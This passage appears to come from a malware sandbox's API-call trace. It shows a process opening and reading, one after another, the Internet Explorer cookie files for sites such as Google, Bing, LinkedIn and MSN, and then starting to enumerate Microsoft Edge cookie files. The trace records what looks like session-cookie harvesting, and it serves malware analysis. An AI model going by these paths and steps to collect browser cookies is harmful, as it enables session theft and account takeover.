lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.206] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97b18 | out: hHeap=0x6c90000) returned 1 [0136.206] CloseHandle (hObject=0x340) returned 1 [0136.206] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.207] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.207] GetFileType (hFile=0x340) returned 0x1 [0136.208] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x201, lpOverlapped=0x0) returned 1 [0136.209] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.209] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c99b28 | out: hHeap=0x6c90000) returned 1 [0136.209] CloseHandle (hObject=0x340) returned 1 [0136.209] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.210] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.210] GetFileType (hFile=0x340) returned 0x1 [0136.210] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x1ea, lpOverlapped=0x0) returned 1 [0136.211] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.211] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c99b28 | out: hHeap=0x6c90000) returned 1 [0136.211] CloseHandle (hObject=0x340) returned 1 [0136.211] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.211] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.212] GetFileType (hFile=0x340) returned 0x1 [0136.212] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x1c8, lpOverlapped=0x0) returned 1 [0136.213] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.214] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c99b28 | out: hHeap=0x6c90000) returned 1 [0136.214] CloseHandle (hObject=0x340) returned 1 [0136.214] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.214] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.215] GetFileType (hFile=0x340) returned 0x1 [0136.215] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x82, lpOverlapped=0x0) returned 1 [0136.216] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.216] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c99b28 | out: hHeap=0x6c90000) returned 1 [0136.216] CloseHandle (hObject=0x340) returned 1 [0136.216] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.217] GetFileType (hFile=0x340) returned 0x1 [0136.217] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x110, lpOverlapped=0x0) returned 1 [0136.218] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.218] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c99b28 | out: hHeap=0x6c90000) returned 1 [0136.218] CloseHandle (hObject=0x340) returned 1 [0136.218] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.218] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c96948 | out: hHeap=0x6c90000) returned 1 [0136.218] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.219] GetFileType (hFile=0x340) returned 0x1 [0136.219] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x256, lpOverlapped=0x0) returned 1 [0136.221] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.221] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c99b28 | out: hHeap=0x6c90000) returned 1 [0136.221] CloseHandle (hObject=0x340) returned 1 [0136.221] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.221] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97770 | out: hHeap=0x6c90000) returned 1 [0136.221] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.222] GetFileType (hFile=0x340) returned 0x1 [0136.222] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0xc4, lpOverlapped=0x0) returned 1 [0136.223] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.224] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c99b28 | out: hHeap=0x6c90000) returned 1 [0136.224] CloseHandle (hObject=0x340) returned 1 [0136.224] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97770 | out: hHeap=0x6c90000) returned 1 [0136.224] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.224] GetFileType (hFile=0x340) returned 0x1 [0136.224] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x21f, lpOverlapped=0x0) returned 1 [0136.225] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.225] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c99b28 | out: hHeap=0x6c90000) returned 1 [0136.225] CloseHandle (hObject=0x340) returned 1 [0136.225] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.225] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce07f8 | out: hHeap=0x6c90000) returned 1 [0136.226] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.226] GetFileType (hFile=0x340) returned 0x1 [0136.226] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x110, lpOverlapped=0x0) returned 1 [0136.228] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.228] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c99b28 | out: hHeap=0x6c90000) returned 1 [0136.228] CloseHandle (hObject=0x340) returned 1 [0136.228] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.228] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.229] GetFileType (hFile=0x340) returned 0x1 [0136.229] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x76, lpOverlapped=0x0) returned 1 [0136.230] ReadFile (in: hFile=0x340, lpBuffer=0x6c99b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c99b28*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.230] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c99b28 | out: hHeap=0x6c90000) returned 1 [0136.230] CloseHandle (hObject=0x340) returned 1 [0136.230] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.230] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.231] GetFileType (hFile=0x340) returned 0x1 [0136.231] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0x337, lpOverlapped=0x0) returned 1 [0136.233] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.234] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x5240cb8 | out: hHeap=0x6c90000) returned 1 [0136.234] CloseHandle (hObject=0x340) returned 1 [0136.234] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c976c8 | out: hHeap=0x6c90000) returned 1 [0136.234] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.235] GetFileType (hFile=0x340) returned 0x1 [0136.235] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0xce, lpOverlapped=0x0) returned 1 [0136.236] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.236] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x5240cb8 | out: hHeap=0x6c90000) returned 1 [0136.236] CloseHandle (hObject=0x340) returned 1 [0136.236] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.236] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce05c8 | out: hHeap=0x6c90000) returned 1 [0136.236] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.236] GetFileType (hFile=0x340) returned 0x1 [0136.237] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0x6c, lpOverlapped=0x0) returned 1 [0136.238] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.238] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x5240cb8 | out: hHeap=0x6c90000) returned 1 [0136.238] CloseHandle (hObject=0x340) returned 1 [0136.238] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce05b8 | out: hHeap=0x6c90000) returned 1 [0136.238] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0590 | out: hHeap=0x6c90000) returned 1 [0136.238] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.239] GetFileType (hFile=0x340) returned 0x1 [0136.239] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0x68, lpOverlapped=0x0) returned 1 [0136.240] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.241] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x5240cb8 | out: hHeap=0x6c90000) returned 1 [0136.241] CloseHandle (hObject=0x340) returned 1 [0136.241] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.241] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.242] GetFileType (hFile=0x340) returned 0x1 [0136.242] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0xb2, lpOverlapped=0x0) returned 1 [0136.243] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.243] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x5240cb8 | out: hHeap=0x6c90000) returned 1 [0136.243] CloseHandle (hObject=0x340) returned 1 [0136.243] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0590 | out: hHeap=0x6c90000) returned 1 [0136.243] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce05b8 | out: hHeap=0x6c90000) returned 1 [0136.243] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.244] GetFileType (hFile=0x340) returned 0x1 [0136.244] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0xd7, lpOverlapped=0x0) returned 1 [0136.245] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.246] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x5240cb8 | out: hHeap=0x6c90000) returned 1 [0136.246] CloseHandle (hObject=0x340) returned 1 [0136.246] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.246] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.246] GetFileType (hFile=0x340) returned 0x1 [0136.246] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0xa9, lpOverlapped=0x0) returned 1 [0136.247] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.247] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x5240cb8 | out: hHeap=0x6c90000) returned 1 [0136.247] CloseHandle (hObject=0x340) returned 1 [0136.247] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.247] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0590 | out: hHeap=0x6c90000) returned 1 [0136.248] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.248] GetFileType (hFile=0x340) returned 0x1 [0136.248] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0x402, lpOverlapped=0x0) returned 1 [0136.250] ReadFile (in: hFile=0x340, lpBuffer=0x5240cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x5240cb8*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.250] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x5240cb8 | out: hHeap=0x6c90000) returned 1 [0136.250] CloseHandle (hObject=0x340) returned 1 [0136.250] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c96948 | out: hHeap=0x6c90000) returned 1 [0136.250] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.250] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cookies\\*.cookie", lpFindFileData=0x18d37c | out: 